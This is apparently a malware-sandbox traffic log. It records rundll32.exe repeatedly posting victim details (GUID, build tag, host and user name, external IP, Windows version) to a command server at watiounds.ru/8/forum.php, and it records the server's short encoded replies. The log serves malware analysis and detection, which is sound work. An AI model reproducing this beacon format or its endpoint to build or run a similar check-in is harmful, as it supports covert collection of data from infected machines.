                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          314192.168.2.224947995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:47.131195068 CEST386OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:47.257323980 CEST387INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 48 53 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYHSBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          315192.168.2.224948095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:47.567349911 CEST388OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:47.695215940 CEST388INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 59 42 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGYBTARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          316192.168.2.224948195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:48.006076097 CEST389OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:48.135432005 CEST389INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:48 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 42 59 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGBYTARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          317192.168.2.224948295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:48.456270933 CEST390OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:48.581422091 CEST390INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:48 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 59 42 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQYBJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          318192.168.2.224948395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:48.903702974 CEST391OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:49.032598972 CEST391INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:49 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 43 58 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNCXMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          319192.168.2.224948495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:49.369448900 CEST392OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:49.492302895 CEST392INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:49 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 4e 4d 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYNMBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          32192.168.2.224919795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:37.810127974 CEST71OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:37.941628933 CEST71INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:37 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 51 4a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGQJTARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          320192.168.2.224948595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:49.814110041 CEST393OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:49.942615986 CEST393INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:49 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 4b 50 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTKPGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          321192.168.2.224948695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:50.260924101 CEST394OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:50.383059978 CEST395INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:50 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 48 53 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGHSTARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          322192.168.2.224948795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:50.706049919 CEST395OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:50.828676939 CEST396INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:50 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 59 42 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVYBEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          323192.168.2.224948895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:51.151055098 CEST397OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:51.280703068 CEST397INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:51 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZAZAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          324192.168.2.224948995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:51.602871895 CEST398OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:51.732634068 CEST398INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:51 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 56 45 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAVEZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          325192.168.2.224949095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:52.048403025 CEST399OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:52.175792933 CEST399INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:52 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 4d 4e 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBMNYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          326192.168.2.224949195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:52.524066925 CEST400OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:52.651070118 CEST400INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:52 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 54 47 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZTGAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          327192.168.2.224949295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:52.967845917 CEST401OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:53.092612028 CEST401INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:53 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 4e 4d 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJNMQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          328192.168.2.224949395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:53.414556026 CEST402OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:53.540388107 CEST402INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:53 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 54 47 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMTGNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          329192.168.2.224949495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:53.866784096 CEST403OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:53.995656013 CEST404INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:53 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 5a 41 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCZAXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          33192.168.2.224919895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:38.262934923 CEST72OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
